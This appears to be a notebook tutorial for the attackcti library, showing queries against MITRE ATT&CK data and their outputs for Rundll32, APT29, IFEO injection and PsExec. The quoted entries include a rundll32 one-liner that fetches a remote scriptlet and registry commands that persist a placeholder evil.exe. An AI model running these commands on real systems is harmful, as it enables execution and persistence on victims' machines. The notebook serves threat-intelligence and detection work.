from attackcti import attack_client
from pandas import *
from pandas.io.json import json_normalize
lift = attack_client()
You can use a custom method in the attack_client class to get a technique across all the matrices by its name. It is case sensitive.
technique_name = lift.get_technique_by_name('Rundll32')
technique_name
[AttackPattern(type='attack-pattern', id='attack-pattern--62b8c999-dcc0-4755-bd69-09442d9359f5', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2017-05-31T21:31:06.045Z', modified='2019-01-31T01:30:34.695Z', name='Rundll32', description='The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.\n\nRundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)', kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')], external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1085', external_id='T1085'), ExternalReference(source_name='Trend Micro CPL', description='Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.', url='https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf'), ExternalReference(source_name='This is Security Command Line Confusion', description='B. Ancel. (2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018.', url='https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_contributors=['Ricardo Dias', 'Casey Smith'], x_mitre_data_sources=['File monitoring', 'Process monitoring', 'Process command-line parameters', 'Binary file metadata'], x_mitre_defense_bypassed=['Anti-virus', 'Application whitelisting', 'Digital Certificate Validation'], x_mitre_detection='Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.', x_mitre_permissions_required=['User'], x_mitre_platforms=['Windows'], x_mitre_version='1.1')]
data_sources = lift.get_all_data_sources()
len(data_sources)
50
data_sources
['anti-virus', 'powershell logs', 'process monitoring', 'kernel drivers', 'disk forensics', 'services', 'third-party application logs', 'authentication logs', 'loaded dlls', 'bios', 'process use of network', 'file monitoring', 'api monitoring', 'browser extensions', 'host network interface', 'vbr', 'network intrusion detection system', 'network protocol analysis', 'netflow/enclave netflow', 'asset management', 'application logs', 'detonation chamber', 'wmi objects', 'user interface', 'component firmware', 'dll monitoring', 'mail server', 'ssl/tls inspection', 'email gateway', 'windows registry', 'process command-line parameters', 'data loss prevention', 'malware reverse engineering', 'web logs', 'web proxy', 'access tokens', 'windows error reporting', 'packet capture', 'dns records', 'binary file metadata', 'digital certificate logs', 'system calls', 'mbr', 'named pipes', 'windows event logs', 'web application firewall logs', 'efi', 'network device logs', 'sensor health and status', 'environment variable']
object_by_id = lift.get_object_by_attack_id('attack-pattern', 'T1307')
object_by_id
[AttackPattern(type='attack-pattern', id='attack-pattern--286cc500-4291-45c2-99a1-e760db176402', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2017-12-14T16:46:06.044Z', modified='2018-10-17T00:14:20.652Z', name='Acquire and/or use 3rd party infrastructure services', description='A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally botnets are available for rent or purchase. Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LUCKYCAT2012)', kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-pre-attack', phase_name='adversary-opsec')], external_references=[ExternalReference(source_name='mitre-pre-attack', url='https://attack.mitre.org/techniques/T1307', external_id='T1307'), ExternalReference(source_name='LUCKYCAT2012', description='Forward-Looking Threat Research Team. (2012). LUCKYCAT REDUX: Inside an APT Campaign with Multiple Targets in India and Japan. Retrieved March 1, 2017.')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_detectable_by_common_defenses='No', x_mitre_detectable_by_common_defenses_explanation='3rd party services highly leveraged by legitimate services, hard to distinguish from background noise. While an adversary can use their own infrastructure, most know this is a sure- re way to get caught. To add degrees of separation, they can buy or rent from another adversary or accomplice.', x_mitre_difficulty_for_adversary='Yes', x_mitre_difficulty_for_adversary_explanation='Wide range of 3rd party services for hosting, rotating, or moving C2, static data, exploits, exfiltration, etc.', x_mitre_old_attack_id='PRE-T1084', x_mitre_version='1.0')]
You can get any Group by its Alias property across all the matrices. It is case sensitive.
group_name = lift.get_group_by_alias('Cozy Bear')
group_name
[IntrusionSet(type='intrusion-set', id='intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2017-05-31T21:31:52.748Z', modified='2019-04-15T21:56:31.571Z', name='APT29', description='[APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to the Russian government and has operated since at least 2008. (Citation: F-Secure The Dukes) (Citation: GRIZZLY STEPPE JAR) This group reportedly compromised the Democratic National Committee starting in the summer of 2015. (Citation: Crowdstrike DNC June 2016)', aliases=['APT29', 'YTTRIUM', 'The Dukes', 'Cozy Bear', 'CozyDuke'], external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/groups/G0016', external_id='G0016'), ExternalReference(source_name='APT29', description='(Citation: F-Secure The Dukes)(Citation: FireEye APT29 Nov 2018)'), ExternalReference(source_name='YTTRIUM', description='(Citation: Microsoft Unidentified Dec 2018)'), ExternalReference(source_name='The Dukes', description='(Citation: F-Secure The Dukes)'), ExternalReference(source_name='Cozy Bear', description='(Citation: Crowdstrike DNC June 2016)'), ExternalReference(source_name='CozyDuke', description='(Citation: Crowdstrike DNC June 2016)'), ExternalReference(source_name='F-Secure The Dukes', description='F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.', url='https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf'), ExternalReference(source_name='GRIZZLY STEPPE JAR', description='Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.', url='https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf'), ExternalReference(source_name='Crowdstrike DNC June 2016', description='Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.', url='https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/'), ExternalReference(source_name='FireEye APT29 Nov 2018', description='Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018.', url='https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html'), ExternalReference(source_name='Microsoft Unidentified Dec 2018', description='Microsoft Defender Research Team. (2018, December 3). Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers. Retrieved April 15, 2019.', url='https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_version='1.1')]
groups = lift.get_all_groups()
one_group = groups[0]
relationships = lift.get_relationships_by_object(one_group)
relationships[0]
Relationship(type='relationship', id='relationship--60d2b385-14cf-454a-ac92-0d41e3ec397a', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2019-04-24T19:50:33.751Z', modified='2019-04-29T18:59:16.590Z', relationship_type='uses', description='[TEMP.Veles](https://attack.mitre.org/groups/G0088) has modified files based on the open-source project cryptcat in an apparent attempt to decrease AV detection rates.', source_ref='intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4', target_ref='attack-pattern--00d0b012-8a03-410e-95de-5826bf542de6', external_references=[ExternalReference(source_name='FireEye TEMP.Veles 2018', description='FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019.', url='https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html ')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'])
The difference with this function and get_all_techniques() is that get_techniques_mitigated_by_all_mitigations returns techniques that have mitigations mapped to them.
techniques_mitigated = lift.get_techniques_mitigated_by_all_mitigations()
techniques_mitigated[0]
AttackPattern(type='attack-pattern', id='attack-pattern--f5bb433e-bdf6-4781-84bc-35e97e43be89', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2019-04-12T18:28:15.451Z', modified='2019-04-29T13:50:06.026Z', name='Firmware Corruption', description='Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices could include the motherboard, hard drive, or video cards.', kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-attack', phase_name='impact')], external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1495', external_id='T1495'), ExternalReference(source_name='Symantec Chernobyl W95.CIH', description='Yamamura, M. (2002, April 25). W95.CIH. Retrieved April 12, 2019.', url='https://www.symantec.com/security-center/writeup/2000-122010-2655-99'), ExternalReference(source_name='MITRE Trustworthy Firmware Measurement', description='Upham, K. (2014, March). Going Deep into the BIOS with MITRE Firmware Security Research. Retrieved January 5, 2016.', url='http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_data_sources=['BIOS', 'Component firmware'], x_mitre_detection='System firmware manipulation may be detected.(Citation: MITRE Trustworthy Firmware Measurement) Log attempts to read/write to BIOS and compare against known patching behavior.', x_mitre_impact_type=['Availability'], x_mitre_permissions_required=['Administrator', 'root', 'SYSTEM'], x_mitre_platforms=['Linux', 'macOS', 'Windows'], x_mitre_version='1.0')
This the function returns information about a specific software STIX object.
all_software = lift.get_all_software()
one_software = all_software[0]
software_techniques = lift.get_techniques_used_by_software(one_software)
software_techniques[0]
AttackPattern(type='attack-pattern', id='attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2019-02-14T16:15:05.974Z', modified='2019-04-29T14:06:06.900Z', name='Domain Trust Discovery', description='Adversaries may attempt to gather information on domain trust relationships that may be used to identify [Lateral Movement](https://attack.mitre.org/tactics/TA0008) opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1178), [Pass the Ticket](https://attack.mitre.org/techniques/T1097), and [Kerberoasting](https://attack.mitre.org/techniques/T1208).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the DSEnumerateDomainTrusts() Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)', kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')], external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1482', external_id='T1482'), ExternalReference(source_name='Microsoft Trusts', description='Microsoft. (2009, October 7). Trust Technologies. Retrieved February 14, 2019.', url='https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc759554(v=ws.10)'), ExternalReference(source_name='AdSecurity Forging Trust Tickets', description='Metcalf, S. (2015, July 15). It’s All About Trust – Forging Kerberos Trust Tickets to Spoof Access across Active Directory Trusts. Retrieved February 14, 2019.', url='https://adsecurity.org/?p=1588'), ExternalReference(source_name='Harmj0y Domain Trusts', description='Schroeder, W. (2017, October 30). A Guide to Attacking Domain Trusts. Retrieved February 14, 2019.', url='http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/ '), ExternalReference(source_name='Microsoft Operation Wilysupply', description='Florio, E.. (2017, May 4). Windows Defender ATP thwarts Operation WilySupply software supply chain cyberattack. Retrieved February 14, 2019.', url='https://www.microsoft.com/security/blog/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/'), ExternalReference(source_name='Microsoft GetAllTrustRelationships', description='Microsoft. (n.d.). Domain.GetAllTrustRelationships Method. Retrieved February 14, 2019.', url='https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectory.domain.getalltrustrelationships?redirectedfrom=MSDN&view=netframework-4.7.2#System_DirectoryServices_ActiveDirectory_Domain_GetAllTrustRelationships')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_contributors=['Dave Westgard', 'Elia Florio, Microsoft', 'Mnemonic', 'RedHuntLabs (@redhuntlabs)'], x_mitre_data_sources=['PowerShell logs', 'API monitoring', 'Process command-line parameters', 'Process monitoring'], x_mitre_detection='System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information, such as <code>nltest /domain_trusts</code>. Remote access tools with built-in features may interact directly with the Windows API to gather information. Look for the DSEnumerateDomainTrusts() Win32 API call to spot activity associated with [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Harmj0y Domain Trusts) Information may also be acquired through Windows system management tools such as [PowerShell](https://attack.mitre.org/techniques/T1086). The .NET method GetAllTrustRelationships() can be an indicator of [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Microsoft GetAllTrustRelationships)\n', x_mitre_permissions_required=['User'], x_mitre_platforms=['Windows'], x_mitre_version='1.0')
If you do not provide the name of a specific Group (Case Sensitive), the function returns information about all the groups available across all the matrices.
groups = lift.get_all_groups()
one_group = groups[0]
group_techniques = lift.get_techniques_used_by_group(one_group)
group_techniques[0]
AttackPattern(type='attack-pattern', id='attack-pattern--62166220-e498-410f-a90a-19d4339d4e99', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2018-01-16T16:13:52.465Z', modified='2018-10-31T13:45:13.024Z', name='Image File Execution Options Injection', description='Image File Execution Options (IFEO) enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., “C:\\dbg\\ntsd.exe -g notepad.exe”). (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nIFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as <code>Debugger</code> values in the Registry under <code>HKLM\\SOFTWARE{\\Wow6432Node}\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\<executable></code> where <code><executable></code> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nIFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IEFO and silent process exit Registry values in <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\</code>. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)\n\nAn example where the evil.exe process is started when notepad.exe exits: (Citation: Oddvar Moe IFEO APR 2018)\n\n* <code>reg add "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512</code>\n* <code>reg add "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe" /v ReportingMode /t REG_DWORD /d 1</code>\n* <code>reg add "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe" /v MonitorProcess /d "C:\\temp\\evil.exe"</code>\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Endgame Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous invocation.\n\nMalware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)', kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')], external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1183', external_id='T1183'), ExternalReference(source_name='Microsoft Dev Blog IFEO Mar 2010', description='Shanbhag, M. (2010, March 24). Image File Execution Options (IFEO). Retrieved December 18, 2017.', url='https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/'), ExternalReference(source_name='Microsoft GFlags Mar 2017', description='Microsoft. (2017, May 23). GFlags Overview. Retrieved December 18, 2017.', url='https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview'), ExternalReference(source_name='FSecure Hupigon', description='FSecure. (n.d.). Backdoor - W32/Hupigon.EMV - Threat Description. Retrieved December 18, 2017.', url='https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml'), ExternalReference(source_name='Symantec Ushedix June 2008', description='Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December 18, 2017.', url='https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&tabid=2'), ExternalReference(source_name='Microsoft Silent Process Exit NOV 2017', description='Marshall, D. & Griffin, S. (2017, November 28). Monitoring Silent Process Exit. Retrieved June 27, 2018.', url='https://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit'), ExternalReference(source_name='Oddvar Moe IFEO APR 2018', description='Moe, O. (2018, April 10). Persistence using GlobalFlags in Image File Execution Options - Hidden from Autoruns.exe. Retrieved June 27, 2018.', url='https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/'), ExternalReference(source_name='Endgame Process Injection July 2017', description='Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.', url='https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_contributors=['Oddvar Moe, @oddvarmoe'], x_mitre_data_sources=['Process monitoring', 'Windows Registry', 'Windows event logs'], x_mitre_defense_bypassed=['Autoruns Analysis'], x_mitre_detection='Monitor for common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as <code>DEBUG_PROCESS</code> and <code>DEBUG_ONLY_THIS_PROCESS</code>. (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nMonitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017)', x_mitre_permissions_required=['Administrator', 'SYSTEM'], x_mitre_platforms=['Windows'], x_mitre_version='1.0')
You can retrieve every software (malware or tool) mapped to a specific Group STIX object
groups = lift.get_all_groups()
one_group = groups[0]
group_software = lift.get_software_used_by_group(one_group)
group_software[0]
Tool(type='tool', id='tool--ff6caf67-ea1f-4895-b80e-4bb0fc31c6db', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2017-05-31T21:32:21.771Z', modified='2018-10-17T00:14:20.652Z', name='PsExec', description='[PsExec](https://attack.mitre.org/software/S0029) is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers. (Citation: Russinovich Sysinternals) (Citation: SANS PsExec)', labels=['tool'], external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/software/S0029', external_id='S0029'), ExternalReference(source_name='Russinovich Sysinternals', description='Russinovich, M. (2014, May 2). Windows Sysinternals PsExec v2.11. Retrieved May 13, 2015.', url='https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx'), ExternalReference(source_name='SANS PsExec', description='Pilkington, M.. (2012, December 17). Protecting Privileged Domain Accounts: PsExec Deep-Dive. Retrieved August 17, 2016.', url='https://digital-forensics.sans.org/blog/2012/12/17/protecting-privileged-domain-accounts-psexec-deep-dive')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_aliases=['PsExec'], x_mitre_platforms=['Windows'], x_mitre_version='1.0')